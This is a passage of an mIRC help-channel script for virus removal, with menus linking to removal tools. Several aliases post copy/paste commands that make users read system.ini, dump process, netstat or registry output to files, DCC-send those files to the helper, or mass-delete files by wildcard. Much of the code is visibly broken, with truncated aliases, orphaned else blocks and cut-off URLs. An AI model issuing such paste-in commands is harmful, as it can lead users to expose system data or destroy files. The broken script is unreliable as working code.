(usually c:\windows\)" | //say 4[12 $$1 4] $+ : por favor escribe 2//play $me
2$shortfn($findfile( $+ %user.win.dir $+ ,system.ini,1)) 2000
....-
....shell entry: //say 12[5 $$1 12] por favor escribe (o copia/pega) lo
siguiente: 2//!msg $chan $me $+ : 2$readini(c:\windows\system.ini,boot,shell)
2$readn
...-
...netstat: { netstat.nohack.es }
...-
...lista de procesos activos: /say 12[5 $$1 12] por favor escribe (o copia/pega)
lo siguiente: 2//!run command /c tasklist >> c:\tasks.txt | //say 12[5 $$1 12]
luego escribe: 2//!dcc send $me c:\tasks.txt
..-
..urls
...windows update: //say 12[5 $$1 12] el website the windows update es
3http://windowsupdate.microsoft.com ( escribe en mirc /run wupdmgr ) una vez alli,
haz click en "product updates" y baja todos los updates criticos que necesites, al
igual que todos los service packs que no esten instalados en tu maquina.
...-
...online scans
....trendmicro o-scan: //say 12[5 $$1 12] puedes hacerte un 4scan para v!ruses
4gratis en 3http://housecall.trendmicro.com/housecall/start_corp.asp deja que
bajen los 4applets y sigue las instrucciones y borra todos los archivos
infectados.
....rav o-scan: //say 12[5 $$1 12] puedes hacerte un 4scan para v!ruses 4gratis
en 3http://www.ravantivirus.com/scan/ click en 12"scan without subscribing". sigue
las instrucciones y borra todos los archivos infectados.
....panda o-scan://say 12[5 $$1 12] puedes hacerte un 4scan para v!ruses 4gratis
en 3http://www.pandasoftware.com/activescan/com/activescan_principal.htm sigue las
instrucciones y borra todos los archivos infectados.
....bitdefender o-scan: //say 12[5 $$1 12] puedes hacerte un 4scan para v!ruses
4gratis en 3http://www.bitdefender.com/scan/licence.php sigue las instrucciones y
borra todos los archivos infectados.
...-
...trojan scanners
....swat it: //say 12[5 $$1 12] consigue swat-it trojan detection and removal
utility en 3http://swatit.org/download.html 4*recuerda* de dar click en 12update
para que el programa se auto-actualize y pueda remover lo ltimo en v!rus/tr0yanos
....pestpatrol: //say 12[5 $$1 12] puedes obtener un 4scan de tr0yanos bajo la
firma pestpatrol en 3http://www.safersite.com/downloads/eval/download.asp (website
en ingls)
....the cleaner: //say 12[5 $$1 12] puedes obtener el remover de troyanos the
cleaner en 3http://www.moosoft.com/products/cleaner/download/ 4*recuerda* que
necesitas tenerlo actualizado haciendo un click moolive que esta en el menu de the
cleaner. luego de actualizarlo, corre el programa. the cleaner removera any
troyano encontrado.4*nota* debes cerrar el mirc si tienes un troyano relacionado
con el mirc y/o irc.
...-
...spyware
....ad-aware: //say 12[5 $$1 12] ad-aware puede ser obtenido en
3http://www.lavasoftusa.com/support/download/
....spybot: //say 12[5 $$1 12] para luchar contra el spyware bajate el spybot en
3http://spybot.safer-networking.de/
....pestscan: //say 12[5 $$1 12] puedes hacerte un 4scan para spyware 4gratis
en 3http://www.pestscan.com/ lea la pgina y clic en 12"scan without registering"
despus deje que los applet bajen y escaneen su pc !
...-
...spam remover
....spam remover [mirchelp.info]: //say 12[5 $$1 12] puedes obtener spam remover
(una herramienta para remover spam en mirc) en
3http://mirchelp.info/nohack/spam_remover.zip 4*nota* el addon esta escrito en
ingls y tiene un readme.txt que debes leer para saber como usar el addon.
....spam remover [vtech - filebox]: //say 12[5 $$1 12] puedes obtener spam
remover (una herramienta para remover spam en mirc) en
3http://filebox.vt.edu/users/onunez/nohack/spam_remover.zip 4*nota* el addon esta
escrito en ingls y tiene un readme.txt que debes leer para saber como usar el
addon.
....spam remover [fruitloop.net]: //say 12[5 $$1 12] puedes obtener spam remover
(una herramienta para remover spam en mirc) en
3http://www.fruitloop.net/nohack/spam_remover.zip 4*nota* el addon esta escrito en
ingls y tiene un readme.txt que debes leer para saber como usar el addon.
...-
...system restore
....xp syst. restore: //say 12[5 $$1 12] para informacin sobre system restore en
4windows xp visita
....me syst. restore: //say 12[5 $$1 12] para informacin sobre system restore en
4windows me visita
...-
...nukes patches: //say 12[5 $$1 12] si usas windows98/95 y necesitas proteccin
para nukes, visita 3http://www.sf.co.yu/patches/index.html
...dos f-prot: //say 12[5 $$1 12] puedes encontrar una versin comprimida del
antivirus f-prot para dos en 3ftp://ftp.f-secure.com/anti-virus/free/ bjate el fp-
312.zip descomprmelo en tu unidad c: y correlo bajo dos-mode
...port scan: //say 12[5 $$1 12] para ver informacin sobre puertos abiertos ve a
3https://grc.com/x/ne.dll?bh0bkyd2
...stinger [mcafee]: //say 12[5 $$1 12] consigue el mcafee avert stinger removal
tool para remover viruses especificos en 3http://vil.nai.com/vil/stinger/ 4*nota*
por favor lee los procedimientos y las instrucciones para bajar y manejar el
programa.
...safe-mode: //say 12[5 $$1 12] informacin para reiniciar tu computadora en
safe mode la encontrars en
...zone alarm: //say 12[5 $$1 12] puedes obtener el firewall zone alarm en
3http://www.zonelabs.com 4*nota* tiene un periodo gratis de 30 das.
...hide/unhide app: //say 12[5 $$1 12] obtn un programa para ver las ventanas y
aplicaciones que estan 4"escondidas" en windows aqu:
3http://www.dejhantulip.net/nohack/tools/hide.exe
...-
...chequear infecciones: /check.virus.es
...instrucciones adicionales: /additional.instructions.es
..-
..removedores
...rats
....dmsetup: //say 12[5 $$1 12] para remover dmsetup por favor baja el siguiente
archivo 3http://www.nohack.net/bin/sysdmfx.exe cierra mirc y correlo !
....subseven: //say 12[5 $$1 12] para remover las 4diferentes variantes del
subseven por favor visita la web 3http://www.hackfix.org/subseven/
....netbus: //say 12[5 $$1 12] para remover las 4diferentes variantes del netbus
por favor visita la web 3http://www.hackfix.org/netbusfix/
...-
...worms
....sobig.f: //say 12[5 $$1 12] obtn el w32.sobig.f@mm removal tool en
3http://securityresponse.symantec.com/avcenter/fixsbigf.exe
....welchia: //say 12[5 $$1 12] obtn el w32.welchia.worm removal tool en
3http://www.symantec.com/avcenter/fixwelch.exe
....blaster: //say 12[5 $$1 12] obtn el w32.blaster.worm removal tool en
3http://securityresponse.symantec.com/avcenter/fixblast.exe y lee & baja el patch
en
3http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulle
tin/ms03-026.asp
;-------> http://securityresponse.symantec.com/avcenter/tools.list.html
<--------
;-------> http://www.bitdefender.com/html/free_tools.php <------------
;-------> http://virusall.com/downrem.html <---------
;-------> http://www.mcafeeb2b.com/naicommon/avert/avert-research-
center/tools.asp#002 <------
..-
..info about...
...-
...w32/klez $+ . $+ h-mm: //say 12[5 $$1 12] si estas infectado/a con el virus
w32/klez.h@mm por favor visita 3http://vil.nai.com/vil/content/v_99455.htm y ve la
informacin especfica acerca del virus. (informacin esta en ingls.)
...w32/klez $+ . $+ e@mm: //say 12[5 $$1 12] si estas infectado/a con el virus
w32/klez.e@mm por favor visita 3http://vil.nai.com/vil/content/v_99367.htm y ve la
informacin especfica acerca del virus. (informacin esta en ingls.)
...w32/sircam $+ . $+ a-mm: //say 12[5 $$1 12] si estas infectado/a con el virus
w32/sircam.a-mm por favor visita 3http://www.nettech-solutions.com/virus_1-1-
3.html y ve la informacin especfica acerca del virus. (informacin esta en ingls.).
...w32/nimda $+ . $+ a@mm: //say 12[5 $$1 12] si estas infectado/a con el virus
w32/nimda.a-mm por favor visita 3http://www.commandcom.com/virus/nimda.html y ve
la informacin especifica acerca del virus. (informacin esta en ingls.)
...w32/aplore $+ . $+ @mm: //say 12[5 $$1 12] si estas infectado/a con el virus
w32/aplore@mm por favor visita
3http://securityresponse.symantec.com/avcenter/venc/data/w32.aplore@mm.html y ve
la informacin especfica acerca del virus. (informacin esta en ingls.)
..-
..dejhantulip.net
...removals
....a
.....aplore (dokfleed): //say 12[5 $$1 12] aplore tiene una herramienta que lo
remueve, bjatela de
3http://www.dejhantulip.net/nohack/removers/dokfleed/aplore.exe
.....autoupder (symantec): //say 12[5 $$1 12] : autoupder tiene una herramienta
que lo remueve, bjatela de
3http://www.dejhantulip.net/nohack/removers/symantec/fixautoupder.exe
....b
.....babylonia (quickheal): //say 12[5 $$1 12] : babylonia tiene una herramienta
3http://www.dejhantulip.net/nohack/removers/quickheal/kbabylon.zip
.....bhong.vbs (fruit^loop): //say 12[5 $$1 12] : bhong.vbs tiene una
herramienta que lo remueve, bjatela de
3http://www.dejhantulip.net/nohack/removers/fruitloop/bhongrem.vbs
.....bo (quickheal): //say 12[5 $$1 12] : backorifice tiene una herramienta que
lo remueve, bjatela de
3http://www.dejhantulip.net/nohack/removers/quickheal/protect.zip
.....buddylist (symantec): //say 12[5 $$1 12] : buddylist tiene una herramienta
3http://www.dejhantulip.net/nohack/removers/symantec/fixbuddy.exe
....c
.....cih (nohack): //say 12[5 $$1 12] : cih tiene una herramienta que lo
remueve, bjatela de
3http://www.dejhantulip.net/nohack/removers/symantec/kill_cih.exe
.....cih (quickheal): //say 12[5 $$1 12] : cih tiene una herramienta que lo
remueve, bjatela de
3http://www.dejhantulip.net/nohack/removers/quickheal/killcih.zip
.....-
.....codered (symantec): //say 12[5 $$1 12] : codered tiene una herramienta que
3http://www.dejhantulip.net/nohack/removers/symantec/fixcred.exe
.....codered.c (bitdefender): //say 12[5 $$1 12] : codered.c tiene una
3http://www.dejhantulip.net/nohack/removers/bitdefender/anticodered.zip
....d
.....dos funlove.4099 (symantec): //say 12[5 $$1 12] : dos funlove.4099 tiene
una herramienta que lo remueve, bjatela de
3http://www.dejhantulip.net/nohack/removers/symantec/fixfun.exe
....f
.....freepics.jpg.vbs (fruit^loop): //say 12[5 $$1 12] : freepics.jpg.vbs tiene
3http://www.dejhantulip.net/nohack/removers/fruitloop/freepicsrem.
....h
.....happy99.worm (symantec): //say 12[5 $$1 12] : happy99.worm tiene una
3http://www.dejhantulip.net/nohack/removers/symantec/fixhappy.exe
.....happy99.worm (quickheal): //say 12[5 $$1 12] : happy99.worm tiene una
3http://www.dejhantulip.net/nohack/removers/quickheal/protect.
.....-
.....haptime.vbs (symantec): //say 12[5 $$1 12] : haptime.vbs tiene una
3http://www.dejhantulip.net/nohack/removers/symantec/fixhaptime.exe
....i
.....i-worm mtx (symantec): //say 12[5 $$1 12] : i-worm mtx tiene una
herramienta que lo remueve, bajatela de
3http://www.dejhantulip.net/nohack/removers/symantec/fixmtx.exe
.....i-worm mtx (quickheal): //say 12[5 $$1 12] : i-worm mtx tiene una
3http://www.dejhantulip.net/nohack/removers/quickheal/killmtx.zip
.....-
.....i-worm magistr.a (symantec): //say 12[5 $$1 12] : i-worm magistr.a tiene
3http://www.dejhantulip.net/nohack/removers/symantec/fixmagi.com
.....i-worm magistr.b (bitdefender): //say 12[5 $$1 12] : i-worm magistr.b tiene
3http://www.dejhantulip.net/nohack/removers/bitdefender/antimagistr.b.exe
.....i-worm magistr.a (bitdefender): //say 12[5 $$1 12] : i-worm magistr.a tiene
3http://www.dejhantulip.net/nohack/removers/bitdefender/antimagistra.exe
.....-
.....i-worm navidad (symantec): //say 12[5 $$1 12] : i-worm navidad tiene una
3http://www.dejhantulip.net/nohack/removers/symantec/fixnavid.com
.....i-worm navidad (quickheal): //say 12[5 $$1 12] : i-worm navidad tiene una
3http://www.dejhantulip.net/nohack/removers/quickheal/killnavb.zip
.....i-worm navidad (f-prot): //say 12[5 $$1 12] : i-worm navidad tiene una
herramienta que lo remueve, bjatela de 3ftp://ftp.europe.f-secure.com/anti-
virus/tools/naviddis.reg
.....i-worm navidad.b1 (bitdefender): //say 12[5 $$1 12] : i-worm navidad.b1
tiene una herramienta que lo remueve, bjatela de
3http://www.dejhantulip.net/nohack/removers/bitdefender/antinavidad.com
.....-
.....i-worm prolin (quickheal): //say 12[5 $$1 12] : i-worm prolin tiene una
3http://www.dejhantulip.net/nohack/removers/quickheal/killcret.zip
.....i-worm prolin (bitdefender): //say 12[5 $$1 12] : i-worm prolin tiene una
3http://www.dejhantulip.net/nohack/removers/bitdefender/antiprolin.exe
.....-
.....i-worm qaz / w32.hllw.qaz.a (symantec): //say 12[5 $$1 12] :
w32.hllw.qaz.a/i-worm qaz tiene una herramienta que lo remueve, bjatela de
3http://www.dejhantulip.net/nohack/removers/symantec/fixqaz.exe
.....i-worm qaz (bitdefender): //say 12[5 $$1 12] : i-worm qaz tiene una
3http://www.dejhantulip.net/nohack/removers/bitdefender/antiqaz.reg
.....-
.....i-worm sircam@mm (symantec): //say 12[5 $$1 12] : i-worm sircam@mm tiene
3http://www.dejhantulip.net/nohack/removers/symantec/fixsirc.
.....i-worm w32.sircam (quickheal): //say 12[5 $$1 12] : i-worm w32.sircam tiene
3http://www.dejhantulip.net/nohack/removers/quickheal/qhwkill.zip
.....i-worm sircam.a (bitdefender): //say 12[5 $$1 12] : i-worm sircam.a tiene
3http://www.dejhantulip.net/nohack/removers/bitdefender/antisircam.exe
....j
.....jpegbat (nohack): //say 12[5 $$1 12] : virus jpeg.bat tiene una herramienta
3http://www.dejhantulip.net/nohack/removers/nohack.bin/jpgbatrem.exe
....k
.....w32.klez (symantec): //say 12[5 $$1 12] : w32.klez tiene una herramienta
3http://www.dejhantulip.net/nohack/removers/symantec/fixklez.com
.....w32.klez.h (quickheal): //say 12[5 $$1 12] : w32.klez.h tiene una
3http://www.dejhantulip.net/nohack/removers/quickheal/killklez.com
.....win32.klez(a,d,e,h) (bitdefender): //say 12[5 $$1 12] win32.klez(a,d,e,h)
3http://www.dejhantulip.net/nohack/removers/bitdefender/antiklez.exe
.....w32.klez (f-prot): //say 12[5 $$1 12] : w32.klez tiene una herramienta que
lo remueve, bjatela de 3ftp://ftp.europe.f-secure.com/anti-virus/tools/fsklez.exe
.....-
.....kak.worm.b (symantec): //say 12[5 $$1 12] : kak.worm.b tiene una
3http://www.dejhantulip.net/nohack/removers/symantec/fixkakb.exe
.....kill_ez (symantec): //say 12[5 $$1 12] : kill_ez tiene una herramienta que
3http://www.dejhantulip.net/nohack/removers/symantec/kill_ez.exe
....l
.....links.vbs (fruit^loop): //say 12[5 $$1 12] : links.vbs tiene una
3http://www.dejhantulip.net/nohack/removers/fruitloop/vbsflrem.exe
.....links.vbs (nohack): //say 12[5 $$1 12] : links.vbs tiene una herramienta
3http://www.dejhantulip.net/nohack/removers/nohack.bin/nolinks.vbs
.....links.vbs (nohack): //say 12[5 $$1 12] : links.vbs tiene una herramienta
3http://www.dejhantulip.net/nohack/removers/nohack.bin/linkrem.vbs
.....-
.....lifestages.vbs (symantec): //say 12[5 $$1 12] : lifestages.vbs tiene una
3http://www.dejhantulip.net/nohack/removers/symantec/fixlife.exe adems de
descargar esa herramienta para remover, vea por favor la pgina de la informacin
3http://www.symantec.com/avcenter/venc/data/fix.vbs.stages.html para informacin
adicional.
.....-
.....loveletter.vbs (symantec): //say 12[5 $$1 12] : loveletter.vbs tiene una
3http://www.dejhantulip.net/nohack/removers/symantec/fixlove.exe adems de
descargar esa herramienta para remover, vea por favor la pgina de la informacin
3http://securityresponse.symantec.com/avcenter/venc/data/fix.vbs.loveletter.html
para informacin adicional.
.....loveletter (nohack): //say 12[5 $$1 12] : loveletter tiene una herramienta
3http://www.dejhantulip.net/nohack/removers/nohack.bin/lovlet-fix.zip
....m
.....millenium.vbs (fruit^loop): //say 12[5 $$1 12] : millenium.vbs tiene una
3http://www.dejhantulip.net/nohack/removers/fruitloop/millenniumrem.vbs
.....msn worms (dokfleed): //say 12[5 $$1 12] : msn worms tiene una herramienta
3http://www.dejhantulip.net/nohack/removers/dokfleed/msn.zip
.....mypicture.bmp.vbs (fruit^loop): //say 12[5 $$1 12] : mypicture.bmp.vbs
3http://www.dejhantulip.net/nohack/removers/fruitloop/mypicsrem.exe
....n
.....w32.nimda.a@mm (symantec): //say 12[5 $$1 12] : w32.nimda.a@mm tiene una
3http://www.dejhantulip.net/nohack/removers/symantec/fixnimda.com
.....w32.nimda.e@mm (symantec): //say 12[5 $$1 12] : w32.nimda.e@mm tiene una
3http://www.dejhantulip.net/nohack/removers/symantec/fxnimdae.com
.....w32.nimda.a (quickheal): //say 12[5 $$1 12] : w32.nimda.a tiene una
3http://www.dejhantulip.net/nohack/removers/quickheal/knimda.zip
.....win32.nimda.a@mm(a,e) (bitdefender): //say 12[5 $$1 12] :
win32.nimda.a@mm(a,e) tiene una herramienta que lo remueve, bjatela de
3http://www.dejhantulip.net/nohack/removers/bitdefender/antinimda.exe
.....w32.nimda (f-prot): //say 12[5 $$1 12] : w32.nimda tiene una herramienta
que lo remueve, bjatela de 3ftp://ftp.europe.f-secure.com/anti-
virus/tools/fsnimda.exe
.....-
.....nudesex.jpg.vbs (fruit^loop): //say 12[5 $$1 12] : nudesex.jpg.vbs tiene
3http://www.dejhantulip.net/nohack/removers/fruitloop/nudesex-jpgrem.vbs
.....nudesex.jpg.vbs (nohack): //say 12[5 $$1 12] : nudexex.jpg.vbs tiene una
3http://www.dejhantulip.net/nohack/removers/nohack.bin/nudesex-jpgrem.vbs
....p
.....prettypark.worm (symantec): //say 12[5 $$1 12] : prettypark.worm tiene una
3http://www.dejhantulip.net/nohack/removers/symantec/fixppark.zip
....r
.....redlof.a (trend micro): //say 12[5 $$1 12] : vbs_redlof.a tiene una
herramienta que lo remueve sysclean.com 4*recuerda* debes bajarte el ltimo archivo
de actualizaciones. este archivo se encuentra en
3http://www.trendmicro.com/download/pattern.asp bajo el nombre de lpt###.zip debes
bajar ese archivo y descomprimirlo en el folder donde est el sysclean.com
.....redlof.b (trend micro): //say 12[5 $$1 12] : vbs_redlof.b puede ser
removido con el onlinescan de trendmicro en
3http://housecall.trendmicro.com/housecall/start_corp.asp 4*nota* para informacin
adicional por favor visita esta pgina web
3http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?vname=vbs_redlof.b#solu
tion
....s
.....story.vbs (fruit^loop): //say 12[5 $$1 12] : story.vbs tiene una
3http://www.dejhantulip.net/nohack/removers/fruitloop/storyrem.vbs
....t
.....trojan.cdlist (bitdefender): //say 12[5 $$1 12] : trojan.cdlist tiene una
3http://www.dejhantulip.net/nohack/removers/bitdefender/anticdlist.zip
.....tune.vbs (fruit^loop): //say 12[5 $$1 12] : tune.vbs tiene una herramienta
3http://www.dejhantulip.net/nohack/removers/fruitloop/vbstunerem.exe
....w
.....w32.yaha (symantec): //say 12[5 $$1 12] : w32.yaha tiene una herramienta
3http://www.dejhantulip.net/nohack/removers/symantec/fixyaha.com
.....w32.yaha a-l (bitdefender): //say 12[5 $$1 12] : w32.yaha (a-l) tiene una
3http://www.dejhantulip.net/nohack/removers/bitdefender/antiyahaa.exe
.....w32.yaha (f-prot): //say 12[5 $$1 12] : w32.yaha tiene una herramienta que
lo remueve, bjatela de 3ftp://ftp.europe.f-secure.com/anti-
virus/tools/yahatool.zip
.....-
.....w95.spaces (bitdefender): //say 12[5 $$1 12] : w95.spaces tiene una
herramienta que lo remove, bajatela de
3http://www.dejhantulip.net/nohack/removers/bitdefender/antiwin95.spacescleaner.ex
e
.....-
.....w32.bugbear@mm (symantec): //say 12[5 $$1 12] : w32.bugbear@mm tiene una
3http://www.dejhantulip.net/nohack/removers/symantec/fxbgbear.exe
.....w32.bugbear.a (bitdefender): //say 12[5 $$1 12] : w32.bugbear.a tiene una
3http://www.dejhantulip.net/nohack/removers/bitdefender/antibugbear.exe
.....-
.....w32.hllw.lovgate (symantec): //say 12[5 $$1 12] : w32.hllw.lovgate tiene
3http://www.dejhantulip.net/nohack/removers/symantec/fixlgate.exe
.....win32.lovgate.c@mm (bitdefender): //say 12[5 $$1 12] : win32.lovgate.c@mm
3http://www.dejhantulip.net/nohack/removers/bitdefender/antilovgate.exe
...-
...registro
....registry cleaner: // say 12[5 $$1 12] puedes conseguir regclean [una
herramienta para limpiar y manipular el registro] en
3http://www.dejhantulip.net/registry/registry_cleaner.exe
....regscrub xp: //say 12[5 $$1 12] puedes conseguir regscrub [una herramienta
que arregla y agiliza el registro] en
3http://www.dejhantulip.net/registry/regscrubxp.exe
...spyware
....spybot: //say 12[5 $$1 12] puedes conseguir spybot [herramienta para remover
spyware] en 3http://www.dejhantulip.net/nohack/removers/spybotsd11.exe
...-
...spam remover: //say 12[5 $$1 12] puedes conseguir spam remover [una
herramienta para remover el spam del mirc] at
3http://www.dejhantulip.net/nohack/files/spam_remover.zip 4*nota* las
instrucciones y el addon esta en ingls. viene con un readme.txt que es aconsejable
leerlo antes de usar el programa.
...-
...win start-up: //say 12[5 $$1 12] bajate este archivo win start-up de
3http://www.dejhantulip.net/nohack/files/startup.exe para ver todas las
aplicaciones que cargan en tu pc cuando inicias windows.
...-
...este add-on: //notice $$1 (private) usted puede bajar el nohack.irc v4.0
hecho por zvonarek en 3http://www.dejhantulip.net/nohack/files/nohackirc.zip
...manual de nohack: //notice $$1 (private) usted puede conseguir el nohack
begginner's manual desde
3http://www.dejhantulip.net/nohack/docs/nh_begg_manual.zip
-
}
; ===========================
; -------- aliases ----------
; ===========================
alias ff {
; example: //msg #nohack $iif($findfile(c:,mirc*.exe,0) > 6,too many
results to display,$findfile(c:,mirc*.exe,0,msg #nohack $1-)))
if ($1 == $null) {
set %ff.1 $$?="enter the file name and extension (wildcards allowed)"
set %ff.2 $$?="enter the directory (and path if you want)"
goto step2
}
else { set %ff.1 $1 }
if ($2 == $null) { set %ff.2 c: }
else { set %ff.2 $2 }
:step2
msg # $snick(#,1) $+ : please type (or copy/paste) the following: 2//!msg
$active 2$iif(2$findfile( $+ %ff.2 $+ , $+ %ff.1 $+ ,0) 2> 6, $+ $me : too many
results to display! 2$findfile( $+ %ff.2 $+ , $+ %ff.1 $+ ,0),2$findfile( $+ %ff.2
$+ , $+ %ff.1 $+ ,0,2msg $active 2$1-)))
else {
msg # $snick(#,1) $+ : please type (or copy/paste) the following: 2//!msg
$active 2$iif(2$findfile( $+ %ff.2 $+ , $+ $1 $+ ,0) 2> 6, $+ $me : too many
results to display! 2$findfile( $+ %ff.2 $+ , $+ $1 $+ ,0),2$findfile( $+ %ff.2 $+
, $+ $1 $+ ,0,2msg $active 2$1-)))
}
}
alias reg.del {
.set %reg.string $$?="please enter the complete registry string/path for the
value"
.set %reg.name $$?="plese enter the name of the registry value"
.write -l1 $mircdir\nohack\registry\fixreg.reg windows registry editor version
5.00
.write -l2 $mircdir\nohack\registry\fixreg.reg
.write -l3 $mircdir\nohack\registry\fixreg.reg $chr(91) $+ %reg.string $+
$chr(93)
.write -l4 $mircdir\nohack\registry\fixreg.reg " $+ %reg.name $+ " $+ =-
.echo -a 4done [ fixreg.reg ]
}
alias rem.files.dir {
.set %wr.dir $$?="specify the directory were the files are gonna be deleted
( example: c:\something\ )"
.set %wr.wildcards $$?="enter the wildcards for the files to be deleted
( example: *temp* , *temp*.exe* , *.txt )"
.set %wr.channel $$?="enter the channel to output the removed files ( example:
#nohack )"
msg # $snick(#,1) $+ : please type (or copy/paste) the following: 2//!while
(2$findfile( $+ %wr.dir $+ , $+ %wr.wildcards $+ ,0) != 0) 2{ 2.set 2%wr 0 2|
2.inc 2%wr 1 2| 2.set 2%wr.file 2$shortfn(2$findfile( $+ %wr.dir $+ , $+
%wr.wildcards $+ ,2%wr)) 2| 2!remove -b 2$shortfn(2$findfile( $+ %wr.dir $+ , $+
%wr.wildcards $+ ,2%wr)) 2| 2!msg %wr.channel removed 2:2: 2%wr.file 2}
}
alias rem.files.dir.remreport {
#nohack )"
msg # $snick(#,1) $+ : please type (or copy/paste) the following: 2//!while
%wr.wildcards $+ ,2%wr)) 2| 2!write c:\remreport.txt removed 2:2: 2%wr.file 2}
}
alias rem.files.dir.es {
#nohack )"
msg # $snick(#,1) $+ : por favor escribe (o copia/pega) lo siguiente: 2//!while
%wr.wildcards $+ ,2%wr)) 2| 2!msg %wr.channel removido 2:2: 2%wr.file 2}
}
alias rem.files.dir.remreport.es {
#nohack )"
msg # $snick(#,1) $+ : por favor escribe (o copia/pega) lo siguiente: 2//!while
%wr.wildcards $+ ,2%wr)) 2| 2!write c:\remreport.txt removido 2:2: 2%wr.file 2}
}
alias type {
if ($chan == #ayuda.virus) {
if ($1 == $null) {
.set %nc.type $$?="escribe el msg..."
say $snick(#,1) $+ , por favor escribe (o copia/pega) lo siguiente: 1,15 $+
%nc.type
halt
}
else {
.set %nc.type $eval($1-,1)
say $snick(#,1) $+ , por favor escribe (o copia/pega) lo siguiente: 1,15 $+
%nc.type
halt
}
}
else {
if ($1 == $null) {
.set %nc.type $$?="enter the msg..."
say $snick(#,1) $+ , please type (or copy/paste) the following: 1,15 $+
%nc.type
halt
}
else {
say $snick(#,1) $+ , please type (or copy/paste) the following: 1,15 $+
%nc.type
halt
}
}
}
alias rtype {
if ($1 == $null) {
say $snick(#,1) $+ , por favor escribe (o copia/pega) lo siguiente: 4 $+
%nc.type
halt
}
else {
%nc.type
halt
}
}
else {
if ($1 == $null) {
say $snick(#,1) $+ , please type (or copy/paste) the following: 4 $+
%nc.type
halt
}
else {
%nc.type
halt
}
}
}
alias btype {
if ($1 == $null) {
%nc.type
halt
}
else {
%nc.type
halt
}
}
else {
if ($1 == $null) {
%nc.type
halt
}
else {
%nc.type
halt
}
}
}
alias nc {
if ($1 == $null) {
.set %nc.tri $$?="enter the msg..."
say $snick(#,1) /\ %nc.tri
halt
}
else {
.set %nc.tri $eval($1-,1)
say .: $+ $snick(#,1) $+ :. /\ %nc.tri
halt
}
}
alias nohack.cmds {
window -fl+o @nohack 200 30 300 200 tahoma 11
clear @nohack
aline 1 @nohack
aline 1 @nohack /remini <inifile> [section] <item>
aline 1 @nohack /writeini -n <inifile> [section] <item> <value>
aline 1 @nohack /remove [-b] <filename>
aline 1 @nohack /play [-t] [channel/nick/stop] <filename> <delay>
aline 1 @nohack /rename <filename> <newfilename>
aline 1 @nohack /rmdir <dirname>
}
alias remove.spam.1.line.es {
set %variant.nohack $$?="input the variant"
msg $chan $snick(#,1) $+ , por favor escribe (o copia/pega) lo siguiente:
2//!remote off 2| !run attrib -r mirc.ini 2| !ignore -r 2| !sockclose * 2| !timers
off 2| !unload -rsn %variant.nohack 2| !remove %variant.nohack 2| !run attrib +r
mirc.ini 2| !msg $chan $me $+ : removido %variant.nohack 2| !msg $chan buscando
%variant.nohack $+ ... 2| !msg $chan 2$findfile(c:\, $+ %variant.nohack $+ ,0,msg
$chan 2$1-) 2| 2!remote on
}
alias remove.spam.1.line {
msg $chan $snick(#,1) $+ , please type (or copy/paste) the following: 2//!remote
off 2| !run attrib -r mirc.ini 2| !ignore -r 2| !sockclose * 2| !timers off 2| !
unload -rsn %variant.nohack 2| !remove %variant.nohack 2| !run attrib +r mirc.ini
2| !msg $chan $me $+ : removed %variant.nohack 2| !msg $chan searching for
%variant.nohack $+ ... 2| !msg $chan 2$findfile(c:\, $+ %variant.nohack $+ ,0,msg
$chan 2$1-) 2| 2!remote on
}
alias remove.step.by.step {
.timer[step0] 1 1 say %step.by.step.nick : please type2 //!unload -rsn
%step.by.step.spamming.virus
.timer[step1] 1 3 say %step.by.step.nick : then type2 //!remove
.timer[step2] 1 5 say %step.by.step.nick : then type2 /timers off
.timer[step3] 1 7 say %step.by.step.nick : then type2 /sockclose *
.timer[step4] 1 9 say %step.by.step.nick : then type2 /sreq ask
.timer[step5] 1 11 say %step.by.step.nick : after you type all of that, type ok!
}
alias remove.step.by.step.es {
.timer[step0] 1 1 say %step.by.step.nick : por favor escribe lo siguiente:2
//!unload -rsn %step.by.step.spamming.virus
.timer[step1] 1 3 say %step.by.step.nick : luego escribe:2 //!remove
.timer[step2] 1 5 say %step.by.step.nick : luego escribe:2 /timers off
.timer[step3] 1 7 say %step.by.step.nick : luego escribe:2 /sockclose *
.timer[step4] 1 9 say %step.by.step.nick : luego escribe:2 /sreq ask
.timer[step5] 1 11 say %step.by.step.nick : despues de haber escrito todo eso,
escribe ok!
}
alias netstat.nohack {
set %netstat.cmds $$?="type the commands to execute with netstat (usually -an or
-rn)"
msg $chan $snick(#) : close all the programs you are running except mirc. then
type (in mirc):2 //run command /c netstat %netstat.cmds > c:\ns.txt and then type
/dcc send $me c:\ns.txt
}
alias netstat.nohack.es {
-rn)"
msg $chan $snick(#) : por favor cierra todos los programas que estes usando
excepto mirc. luego escribe (en mirc):2 //run command /c netstat %netstat.cmds >
c:\ns.txt y luego escribe /dcc send $me c:\ns.txt
}
alias reg.specific.nohack {
msg $chan $snick(#) : please type (or copy/paste):2 //run regedit /e c:\rs.txt
%regedit.specific.nohack
msg $chan $snick(#) : after you do that type:2 //say $exists(c:\rs.txt) = rs.txt
}
alias reg.specific.nohack.es {
msg $chan $snick(#) : por favor escribe (o copia/pega) lo siguiente:2 //run
regedit /e c:\rs.txt %regedit.specific.nohack
msg $chan $snick(#) : luego de hacer eso por favor escribe (o copia/pega) lo
siguiente:2 //say $exists(c:\rs.txt) = rs.txt
}
alias /show {
echo -a -vscan- [ls] 80 of 80 terms matched your query:
echo -a -vscan- [ls] blebla help noob usage adaware
antinuke
echo -a -vscan- [ls] aplore aploreremover avdisk avg
avp
echo -a -vscan- [ls] badtrans bhong.vbs blink bugbear
chernobyl.vbs
echo -a -vscan- [ls] cih cleaner copypaste dmsetup dokmirc
doly
echo -a -vscan- [ls] exbuz falseaplore firewall firewalls fprotdos
freelove.vbs
echo -a -vscan- [ls] freepics.jpg.vbs goner gtbot haptime
hybris
echo -a -vscan- [ls] ident ily jdbgmgr jpg.bat
js.exception karma
echo -a -vscan- [ls] klez klezreview lifescan lifestage links
lop.com
echo -a -vscan- [ls] mcafee movie.avi.pif mtx netbus
nimda
echo -a -vscan- [ls] nimdaprotect nkie nohack nudesex
oblivion
echo -a -vscan- [ls] ports portscan ppark reg-backup reg-
restore restore
echo -a -vscan- [ls] safemode scripts security sircam spamblock
spamclean
echo -a -vscan- [ls] startup story.vbs submittrojan swatit
symantec
echo -a -vscan- [ls] tunes.vbs updates vbs vbs.lava virusscan
vscan
echo -a -vscan- [ls] yaha zonealarm
echo -a -vscan- [ls] see also: .show <term>
}
alias auto.remove.nohack.a {
if ($active == #nohack) { //say %nick.helped.a $+ : please type (or copy/paste)
